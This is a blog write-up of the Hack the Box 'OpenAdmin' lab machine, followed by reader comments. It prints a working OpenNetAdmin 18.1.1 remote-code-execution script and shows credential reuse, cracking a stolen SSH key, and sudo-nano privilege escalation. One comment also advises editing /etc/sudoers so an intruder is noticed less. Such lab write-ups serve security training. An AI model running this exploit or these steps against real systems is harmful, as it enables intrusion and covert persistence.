Hack the Box OpenAdmin Writeup – 10.10.10.171
Hello, welcome to our Hack the Box write up series. Today we are doing OpenAdmin (10.10.10.171), is an easy Linux box.
HackTheBox’s first machine of 2020 seems to be a new year’s gift from HTB to gain some points and ranks all their users. This machine is very simple and straight-forward.
Let us start.
NMAP Port Scan
As usual, let us add the machine’s IP to etc/hosts as openadmin.htb for easier access. The next step is to run start the namp scan.
# root @ ns09 in ~/htb/openadmin [21:53:45]
$ cat OpenAdmin_all_ports.nmap
# Nmap 7.80 scan initiated Sun Jan 5 23:03:08 2020 as: nmap -sC -sV -T5 -p- -oA OpenAdmin_all_ports openadmin.htb
Warning: 10.10.10.171 giving up on port because retransmission cap hit (2).
Nmap scan report for openadmin.htb (10.10.10.171)
Host is up (0.15s latency).
Not shown: 65503 closed ports, 30 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan 5 23:16:37 2020 -- 1 IP address (1 host up) scanned in 808.45 seconds
# root @ ns09 in ~/htb/openadmin [21:53:57] The namp scan result shows, SSH on port 22, TCP port 80 which normally runs an HTTP service are open. A quick visit to port 80 shows the Apache2 website’s default welcome page.
The box is not disclosed anything interesting so far apart from a webpage and SSH. We might need to find directories for better enumeration. To see directories we need to run Dirbiuster, Let us set Dirbuster’s medium wordlist and start the scan.
let the Dirbuster run in the background and let us start enumerating the subdirectories it showed in the initial results. I started to concentrate on two directories, ONA and Music. I opened the http://openadmin.htb/ona which took me a webpage. This is the OpenNetAdmin control panel. The OpenNetAdmin is an opensource IP Address Management (IPAM) system.
A warning on the homepage shows the version of the app is 18.1.1. A quick look at vulnerabilities of version 18.1.1 on Google, shows the current version is vulnerable to RCE (remote code execution). So, at this point, we understood that this box is a victim of recently discovered exploit.
The ExploitDB listed two exploits, a Metasploit module, and a bash script.
# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
# Exploit Title: OpenNetAdmin v18.1.1 RCE
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
#!/bin/bash
URL="${1}"
while true;do
echo -n "$ "; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
I just download the script to my OpenAdmin working directory and run the script. The script gave me a shell as www-data immediately.
Since the user www-data is a low privileged user, we will not be able to perform any major tasks. So, we need to escalate his privilege to the next big user.
First, we need to find the users in the box. let us use cat /etc/passwd to see if we can perform the cat command to list the users.
$ ls -l /etc/passwd
-rw-r--r-- 1 root root 1660 Nov 22 18:01 /etc/passwd
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash
$
So we found a number of users in this box, but I’m not sure which one I should start to above to get the privilege. let us start to enumerate the box searching for hints.
After a while, I found a PHP file called “database_settings.inc.php” inside the directory; /opt/ona/www/local/config/. The file has MySQL database credentials.
So far, we are not sure about which user we could use these credentials, so I listed the current local users of the box and I found jimmy and joanna.
$ cat /opt/ona/www/local/config/database_settings.inc.php
<?php
$ona_contexts=array (
'DEFAULT' =>
array (
'databases' =>
array (
0 =>
array (
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
'db_debug' => false,
),
),
'description' => 'Default data context',
'context_color' => '#D3DBFF',
),
);
$
Privilege Escalation
As the SSH was running, I tried ssh the box as jimmy, luckily it worked.
# root @ ns09 in ~/htb/openadmin [20:32:08]
$ ssh jimmy@openadmin.htb
jimmy@openadmin.htb's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed Jan 8 17:33:45 UTC 2020
System load: 0.38 Processes: 200
Usage of /: 49.1% of 7.81GB Users logged in: 2
Memory usage: 34% IP address for ens160: 10.10.10.171
Swap usage: 0%
=> There is 1 zombie process.
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
41 packages can be updated.
12 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Wed Jan 8 17:30:22 2020 from 10.10.15.63
jimmy@openadmin:~$ ls
jimmy@openadmin:~$ cd home
-bash: cd: home: No such file or directory
jimmy@openadmin:~$ ls -la
total 32
drwxr-x--- 5 jimmy jimmy 4096 Nov 22 23:15 .
drwxr-xr-x 4 root root 4096 Nov 22 18:00 ..
lrwxrwxrwx 1 jimmy jimmy 9 Nov 21 14:07 .bash_history -> /dev/null
-rw-r--r-- 1 jimmy jimmy 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 jimmy jimmy 3771 Apr 4 2018 .bashrc
drwx------ 2 jimmy jimmy 4096 Nov 21 13:52 .cache
drwx------ 3 jimmy jimmy 4096 Nov 21 13:52 .gnupg
drwxrwxr-x 3 jimmy jimmy 4096 Nov 22 23:15 .local
-rw-r--r-- 1 jimmy jimmy 807 Apr 4 2018 .profile
jimmy@openadmin:~$ However, after a while, It has been realized this user doesn’t have a User flag, so let us proceed to enumerate more. The user’s www folder has a special folder called “internal” which contained,
jimmy@openadmin:~$ ls
jimmy@openadmin:~$ ls -la
total 32
drwxr-x--- 5 jimmy jimmy 4096 Nov 22 23:15 .
drwxr-xr-x 4 root root 4096 Nov 22 18:00 ..
lrwxrwxrwx 1 jimmy jimmy 9 Nov 21 14:07 .bash_history -> /dev/null
-rw-r--r-- 1 jimmy jimmy 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 jimmy jimmy 3771 Apr 4 2018 .bashrc
drwx------ 2 jimmy jimmy 4096 Nov 21 13:52 .cache
drwx------ 3 jimmy jimmy 4096 Nov 21 13:52 .gnupg
drwxrwxr-x 3 jimmy jimmy 4096 Nov 22 23:15 .local
-rw-r--r-- 1 jimmy jimmy 807 Apr 4 2018 .profile
jimmy@openadmin:~$ cd /
jimmy@openadmin:/$ ls
bin cdrom etc initrd.img lib lost+found mnt proc run snap swap.img tmp var vmlinuz.old
boot dev home initrd.img.old lib64 media opt root sbin srv sys usr vmlinuz
jimmy@openadmin:/$ cd var
jimmy@openadmin:/var$ ls
backups cache crash lib local lock log mail opt run snap spool tmp www
jimmy@openadmin:/var$ cd www
jimmy@openadmin:/var/www$ ls
html internal ona
jimmy@openadmin:/var/www$ cd internal
jimmy@openadmin:/var/www/internal$ ls
index.php logout.php main.php
jimmy@openadmin:/var/www/internal$ cat main.php
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); };
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
jimmy@openadmin:/var/www/internal$ The file “main.php” is our key to get the private key from user Joanna and login as Joanna. To get the private key, we need to run a cURL command. Upon proceeding to run cURL as local, We are blocked by an error “404 Not Found” with 127.0.0.1 running in the port 80. This made me realized that I need to find the port number which will give me access to the private key.
jimmy@openadmin:~$ curl http://127.0.0.1/main.php
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 80</address>
</body></html>
jimmy@openadmin:~$
To find open ports within the system, I run “netstat -tulpn” command. The netstat listed a few open and listening ports:
jimmy@openadmin:/var/www/internal$ netstat -tulpn
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:52846 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
I proceed with one by one, the second port 52846 returned the private key of user Joanna.
jimmy@openadmin:/var/www/internal$ curl http://127.0.0.1:3306/main.php
Warning: Binary output can mess up your terminal. Use "--output -" to tell
Warning: curl to output it to your terminal anyway, or consider "--output
Warning: <FILE>" to save to a file.
jimmy@openadmin:/var/www/internal$ curl http://127.0.0.1:52846/main.php
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D
kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO
ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE
6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ
ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du
y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI
9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4
piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/
/U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH
40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ
fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb
9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80
X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg
S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F
FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh
Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa
RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z
uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr
1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
-----END RSA PRIVATE KEY-----
</pre><html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
jimmy@openadmin:/var/www/internal$ The SSH key has a password phrase for login, I copied the key to my Kali machine and used John to crack the password using rockyou.txt. John cracked the password as “bloodninjas“. I immediately SSH the box- as Joanna and got the user.txt.
joanna@openadmin:~$ ls
user.txt
joanna@openadmin:~$ cat user.txt
c9b2c[---------]c81b5f
joanna@openadmin:~$ Getting Into the Root
There are two ways you can get the root access on this machine using the privileges of our user Joanna. The first one is very simple by opening the nano as root and reding the root.txt file. The second one is getting the shell as root by adding yourself as the root user by editing the etc/passwd file, and then switch the user as your own user name.
Procedure 1: getting the root flag from nano:
The sudo -l command revealed that the user Joanna is able to run bin/nano /opt/priv as root without password. When you see the user can run nano as root, it is the simplest thing to exploit. Just 3 commands and the box is yours.
Run:
joanna@openadmin:~$ sudo /bin/nano /opt/privDoes the Sudo confirm if you really need to run the file as root? obviously say “yes”.
Now, that you have nano running as root. Press CTR+ R (Read File) root/root.txt
And CTR+O (Write file) to read the root.txt.
Procedure 2: Adding yourself as a root user
Press CTRL+O to read the file etc/passwd
Now the nano displays the contents of etc/passwd file, create a user in your name and assign a password and save using CTRL+O (Write file). Then exit the nano, go back to the terminal.
That’s it. Thank you for reading.
when i connect to ssh say the password is wrong ! so how you get the connection 😀
I had the right password, Lol. Check your password. BTW, I just wakeup my laptop from sleeping and logged in, connect HTB VPN and then connect the SSH, just to check if I was wrong, but I was right, its working.
when i connect to first time with user [jimmy] and password [n1nj4W4rri0R!] using my ssh on kali [ssh jimmy@ openadmin . htb ] it say permission denied , so i don’t know why that happen after i type the password even i rest the machine more than once !!
Hello,
I just left you some respect on HTB. I appreciate you posting your methods. I try to find at least 2 or 3 write-ups to compare how I approached the problem compared to others. Interesting enough I always find something and learn something new. I just wanted to say thanks and BTW you can use nano to run commands. you can do a cntrl-r and then a control-x … this approach was helpful for me when taking down openadmin.
Cheers,
Ch3ckm473
Thanks for the respect and for suggesting the Nano 🙂
Was a good write up. I couldn’t get john to work but the rest was good. Only thing I did differently was instead of adding an account for me, I just modified /etc/sudoers to say
joanna (ALL) NOPASSWD: ALL.
No additional users to raise suspicion, might preserve my presence in the system for a bit longer.